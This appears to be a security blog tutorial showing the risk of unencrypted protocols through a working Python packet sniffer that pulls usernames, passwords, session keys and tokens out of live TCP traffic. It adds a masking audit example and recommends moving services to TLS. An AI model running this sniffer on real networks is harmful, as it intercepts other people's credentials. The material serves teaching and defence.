danger of unencrypted protocols with Password Sniffer


The internet, as well as local area networks, consists of a huge number of services. You use HTTP(S) for surfing web pages, SMTP to send emails, POP3 or IMAP to read emails, ICQ, IRC, Skype or Jabber to chat and so on.

Most people should by now have heard that HTTP without the S is insecure and should not be used to send one's bank account data through the net. However, most protocols for daily use are plaintext protocols, like ICQ or SMTP and IMAP/POP3. Facebook, the biggest social network in the world, has recently adopted HTTPS as default. One can activate SSL encryption for most commonly used protocols, or install an SSL proxy in front of a service if it doesn't support SSL by itself, but only a few people care about data security and encryption.

Unencrypted network traffic is the low-hanging fruit every attacker is searching for. Why should an attacker try to crack passwords if he can easily read them?

Password Sniffer


The danger of unencrypted protocols can most effectively be demonstrated with the help of a password sniffer. Even people who “do not have anything to hide” recognize that the interception of their username and password endangers their privacy, and they would like to avoid it if possible. Therefore we will now write a program that hunts for username and password combinations by matching predefined strings against each packet's payload and dumps them on the display. To do so, we will adapt the source code.



#!/usr/bin/python3

import sys
import re
import getopt
import pcapy
from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder


#interface to sniff on
dev = "wlan0"

#pcap filter
filter = "tcp"

#Decoder for all layers
eth_dec = EthDecoder()
ip_dec = IPDecoder()
tcp_dec = TCPDecoder()

#pattern that match username and passwords

pattern = re.compile(r"""(?P<found>(USER|USERNAME|PASS|PASSWORD|LOGIN|BENUTZER|PASSWORD|AUTH|ACCESS|ACCESS_?KEY|SESSION|SESSION_?KEY|TOKEN)[=:\s].+)\B""",
                     re.MULTILINE|re.IGNORECASE)

#This function will be called for every packet, decode it and try to find a username or password in it.

def handle_packet(hdr, data):
    eth_pkt = eth_dec.decode(data)
    ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string())
    tcp_pkt = tcp_dec.decode(ip_pkt.get_data_as_string())
    # Under Python 3 get_data_as_string() returns bytes; latin-1 maps every
    # byte to one character, so the str pattern can be applied to it
    payload = ip_pkt.get_data_as_string().decode("latin-1")

    match = pattern.search(payload)
    # Ignore connection setup and teardown segments (SYN, RST, FIN)
    if not tcp_pkt.get_SYN() and not tcp_pkt.get_RST() and \
            not tcp_pkt.get_FIN() and match and \
            match.groupdict()['found'] is not None:
        print("%s:%d -> %s:%d" % (ip_pkt.get_ip_src(), tcp_pkt.get_th_sport(),
                                  ip_pkt.get_ip_dst(), tcp_pkt.get_th_dport()))
        print("\t%s\n" % (match.groupdict()['found']))

def usage():
    print(sys.argv[0] + " -i <dev> -f <pcap_filter>")
    sys.exit(1)

# Parsing parameter
try:
    cmd_opts = "f:i:"
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt[0] == "-f":
        filter = opt[1]
    elif opt[0] == "-i":
        dev = opt[1]
    else:
        usage()

# Start sniffing
pcap = pcapy.open_live(dev, 1500, 0, 100)
pcap.setfilter(filter)
print("Sniffing passwords on " + str(dev))
pcap.loop(10, handle_packet)





This time we filter TCP traffic, because the author is not aware of any UDP-based protocols that have a login or authentication mechanism.


As decoders we additionally define IPDecoder and TCPDecoder, so that the function handle_packet can extract the IP and TCP headers. Each decoder is given the packet from the previous layer: IPDecoder gets the ETH packet, TCPDecoder gets the IP packet, and so forth. The payload of the IP packet can be accessed as an ASCII string with the help of the method get_data_as_string(), which sometimes leads to ugly undisplayable characters, especially when dumping binary data. Therefore we first match the payload against a regular expression (Sect. 3.9) to make sure it contains a string like User, Pass, Password or Login. In contrast to regular password sniffers, our sniffer does not just search in predefined protocols but in all TCP traffic, and tries to detect other authentication mechanisms like session keys and cookies besides username and password combinations.
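
The same matching idea used as an audit, in an added example that is not part of the original post: it scans constructed payloads with the post's keyword list, reports which destination ports carried credentials in cleartext, and masks the values it finds. The names CRED, mask, find_exposures and exposed_ports, the tightened value bounds and the sample flows are assumptions of this example; the TLS record shows that encrypted traffic produces no match.

```python
import re

# Keyword list taken from the sniffer's pattern; compiled for bytes so raw
# payloads need no decoding. Group names and value bounds are this example's.
CRED = re.compile(
    rb"(?P<key>USER(?:NAME)?|PASS(?:WORD)?|LOGIN|BENUTZER|AUTH"
    rb"|ACCESS(?:_?KEY)?|SESSION(?:_?KEY)?|TOKEN)[=:\s](?P<value>[^\r\n&]+)",
    re.IGNORECASE)

# Constructed sample flows: (destination port, TCP payload bytes).
SAMPLE_FLOWS = [
    (110, b"USER alice\r\n"),
    (110, b"PASS s3cret\r\n"),
    (80, b"POST /signin HTTP/1.1\r\nHost: shop.example\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
         b"username=alice&password=s3cret"),
    # TLS application-data record header plus stand-in ciphertext bytes.
    (995, b"\x17\x03\x03\x00\x10" + bytes(range(0x80, 0x90))),
]

def mask(value):
    """Keep the first character only, so reports never store the secret."""
    text = value.decode("latin-1")
    return text[:1] + "*" * (len(text) - 1)

def find_exposures(flows):
    """Return (dst_port, keyword, masked_value) for every cleartext hit."""
    findings = []
    for dst_port, payload in flows:
        for m in CRED.finditer(payload):
            key = m.group("key").decode("ascii").upper()
            findings.append((dst_port, key, mask(m.group("value").strip())))
    return findings

def exposed_ports(findings):
    """Ports on which credentials crossed the wire unencrypted."""
    return sorted({port for port, _, _ in findings})

if __name__ == "__main__":
    results = find_exposures(SAMPLE_FLOWS)
    for port, key, masked in results:
        print("port %d: %s %s" % (port, key, masked))
    print("migrate to TLS:", exposed_ports(results))
```

The ports it lists are the services to move behind TLS or an SSL proxy, as the post recommends.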





 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. We do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
 
 
 
